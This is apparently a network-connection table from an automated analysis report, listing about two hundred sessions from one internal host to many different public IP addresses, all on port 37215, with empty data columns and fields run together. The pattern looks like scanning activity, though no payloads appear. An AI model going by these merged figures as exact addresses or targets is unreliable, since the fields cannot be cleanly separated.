                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18393192.168.2.1551010138.105.13.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18394192.168.2.1543924181.217.60.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18395192.168.2.1552838190.159.98.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18396192.168.2.1540696197.50.13.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18397192.168.2.154426831.72.117.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18398192.168.2.1549800121.198.165.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18399192.168.2.1553514138.74.243.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18400192.168.2.155455245.12.103.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18401192.168.2.1556204156.218.229.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18402192.168.2.1552300138.212.239.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18403192.168.2.1535560102.249.2.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18404192.168.2.154550841.52.42.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18405192.168.2.1549198222.111.186.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18406192.168.2.1543886222.159.158.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18407192.168.2.1543090157.239.116.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18408192.168.2.1537110121.211.153.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18409192.168.2.1553352157.17.137.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18410192.168.2.154801031.155.173.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18411192.168.2.1558584197.28.16.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18412192.168.2.155938237.134.193.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18413192.168.2.1558332190.30.113.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18414192.168.2.155151631.252.71.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18415192.168.2.1535578190.250.22.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18416192.168.2.1558994156.145.94.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18417192.168.2.155249441.9.229.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18418192.168.2.153421241.50.189.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18419192.168.2.153411642.178.197.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18420192.168.2.153496237.38.187.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18421192.168.2.153626245.43.244.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18422192.168.2.1559154138.251.222.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18423192.168.2.154384441.183.191.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18424192.168.2.1552706181.232.15.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18425192.168.2.1535884181.8.211.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18426192.168.2.1560434121.81.211.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18427192.168.2.1555056190.101.6.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18428192.168.2.1552878122.96.7.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18429192.168.2.1549086102.45.100.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18430192.168.2.1548624138.238.226.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18431192.168.2.154928464.33.100.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18432192.168.2.1552990138.174.32.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18433192.168.2.1555524157.190.190.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18434192.168.2.1548230190.175.181.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18435192.168.2.155789831.236.118.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18436192.168.2.1554458181.34.34.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18437192.168.2.1542906102.94.169.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18438192.168.2.1551278186.218.80.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18439192.168.2.1558144122.45.60.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18440192.168.2.154424450.21.214.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18441192.168.2.154613031.38.199.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18442192.168.2.1543756122.4.96.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18443192.168.2.155035231.141.226.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18444192.168.2.1554548186.233.76.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18445192.168.2.1534462111.240.89.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18446192.168.2.1555296122.225.101.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18447192.168.2.1537634197.9.199.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18448192.168.2.154599441.82.81.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18449192.168.2.155315241.155.122.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18450192.168.2.1544262121.254.225.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18451192.168.2.1548062138.204.243.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18452192.168.2.1539854167.206.98.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18453192.168.2.1540752156.105.70.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18454192.168.2.1550354121.187.189.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18455192.168.2.1543512157.86.45.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18456192.168.2.1543028102.161.177.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18457192.168.2.1560072121.23.196.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18458192.168.2.1541752187.152.194.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18459192.168.2.154772637.184.25.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18460192.168.2.1541444156.231.157.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18461192.168.2.1536452157.153.160.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18462192.168.2.1545930190.34.106.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18463192.168.2.1534424122.43.38.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18464192.168.2.154676441.47.201.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18465192.168.2.154228641.13.110.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18466192.168.2.1538394138.212.74.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18467192.168.2.1539000190.29.90.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18468192.168.2.1550662157.176.185.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18469192.168.2.1540946121.240.71.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18470192.168.2.1554276222.185.163.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18471192.168.2.153304041.165.217.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18472192.168.2.154421694.119.115.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18473192.168.2.1533434186.2.55.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18474192.168.2.1546322138.165.28.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18475192.168.2.1552702197.167.65.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18476192.168.2.1558922186.47.39.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18477192.168.2.1555076138.56.241.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18478192.168.2.1549662122.153.110.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18479192.168.2.1537592197.145.151.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18480192.168.2.1537638122.176.93.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18481192.168.2.1556542121.118.6.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18482192.168.2.1556108122.151.57.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18483192.168.2.154384437.7.222.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18484192.168.2.1540268102.244.162.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18485192.168.2.1539030222.233.180.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18486192.168.2.1535734157.99.65.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18487192.168.2.1544916190.71.61.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18488192.168.2.154172831.123.192.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18489192.168.2.1534858157.238.50.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18490192.168.2.154996441.77.24.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18491192.168.2.1560548156.0.12.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18492192.168.2.153614041.73.192.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18493192.168.2.1537254197.44.93.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18494192.168.2.153548845.39.113.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18495192.168.2.1545034197.190.98.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18496192.168.2.155385094.127.73.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18497192.168.2.1554986186.246.149.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18498192.168.2.1559622102.15.217.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18499192.168.2.1555618222.9.81.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18500192.168.2.1550154186.149.85.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18501192.168.2.1545438156.38.238.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18502192.168.2.1554158222.185.137.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18503192.168.2.1543440157.103.56.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18504192.168.2.153759437.202.242.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18505192.168.2.1548484186.164.145.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18506192.168.2.1556834186.30.124.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18507192.168.2.1557992181.254.222.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18508192.168.2.155035245.87.221.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18509192.168.2.1534818138.127.170.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18510192.168.2.156081894.57.65.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18511192.168.2.155690431.223.145.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18512192.168.2.1542542156.142.101.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18513192.168.2.1555000186.140.154.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18514192.168.2.153575637.76.178.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18515192.168.2.156011445.161.245.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18516192.168.2.1550130121.174.215.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18517192.168.2.1536048222.132.198.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18518192.168.2.1543160186.37.251.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18519192.168.2.153704641.135.210.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18520192.168.2.155094831.187.207.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18521192.168.2.1537372182.238.20.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18522192.168.2.153777631.232.160.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18523192.168.2.1535016197.137.53.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18524192.168.2.156063031.94.86.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18525192.168.2.155920237.56.209.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18526192.168.2.1543726190.184.253.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18527192.168.2.155417437.11.26.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18528192.168.2.1537416102.23.230.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18529192.168.2.1540780138.213.147.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18530192.168.2.1536174181.70.179.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18531192.168.2.155885845.92.122.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18532192.168.2.153751237.148.17.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18533192.168.2.1538602122.255.224.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18534192.168.2.1557380186.50.62.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18535192.168.2.1538508138.137.146.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18536192.168.2.1541558102.36.202.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18537192.168.2.1550126121.95.222.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18538192.168.2.1549430186.144.2.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18539192.168.2.1541412181.233.57.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18540192.168.2.1556892220.104.68.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18541192.168.2.154634437.42.48.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18542192.168.2.153419441.62.61.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18543192.168.2.1554014190.85.116.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18544192.168.2.1533818190.125.119.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18545192.168.2.1551720122.253.213.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18546192.168.2.1558282222.185.3.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18547192.168.2.156064294.83.218.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18548192.168.2.1559954186.204.254.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18549192.168.2.153982845.85.230.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18550192.168.2.155577437.109.48.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18551192.168.2.1537012190.140.16.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18552192.168.2.1558716138.138.121.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18553192.168.2.153781241.128.118.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18554192.168.2.1540728190.7.184.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18555192.168.2.154950031.179.15.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18556192.168.2.1545398186.21.246.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18557192.168.2.1542624122.160.43.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18558192.168.2.1533170138.52.2.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18559192.168.2.1554422190.18.64.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18560192.168.2.1548284197.82.114.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18561192.168.2.154016041.232.232.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18562192.168.2.1553230190.233.145.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18563192.168.2.155666837.204.172.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18564192.168.2.154750094.19.245.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18565192.168.2.1557520186.157.231.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18566192.168.2.1548654186.54.106.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18567192.168.2.1544210122.150.112.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18568192.168.2.1548404159.3.5.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18569192.168.2.1553774121.84.174.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18570192.168.2.155668494.0.250.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18571192.168.2.1550526122.125.40.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18572192.168.2.1532998156.11.199.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18573192.168.2.1556910186.216.40.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18574192.168.2.154253031.143.117.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18575192.168.2.154619445.225.86.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18576192.168.2.153791841.163.86.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18577192.168.2.1552692222.191.200.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18578192.168.2.155048431.89.102.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18579192.168.2.153735827.154.18.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18580192.168.2.153361245.150.83.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18581192.168.2.1544008121.17.210.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18582192.168.2.1557610121.169.94.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18583192.168.2.1534666181.63.72.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18584192.168.2.1543816181.7.2.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18585192.168.2.1542504181.151.17.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18586192.168.2.1558278138.37.249.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18587192.168.2.1546556121.228.63.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18588192.168.2.1560150122.111.57.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18589192.168.2.1557136190.251.12.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18590192.168.2.1533512222.170.234.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18591192.168.2.1547126121.68.79.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18592192.168.2.1558056197.249.60.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18593192.168.2.1542340190.159.131.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18594192.168.2.1552302186.178.109.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18595192.168.2.1552430138.81.19.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18596192.168.2.1551988181.138.87.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18597192.168.2.1546706156.219.213.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18598192.168.2.1555906197.99.226.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18599192.168.2.155310094.152.114.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18600192.168.2.1541448197.45.205.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18601192.168.2.1549714190.255.201.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18602192.168.2.1537768190.27.251.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18603192.168.2.1538790157.124.16.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18604192.168.2.155940445.97.177.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18605192.168.2.1556652222.32.247.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18606192.168.2.1550028222.15.123.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18607192.168.2.1539104174.85.34.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18608192.168.2.1547588181.39.11.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18609192.168.2.1542616157.158.134.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18610192.168.2.1544676109.67.116.7337215
                                              TimestampBytes transferredDirectionData


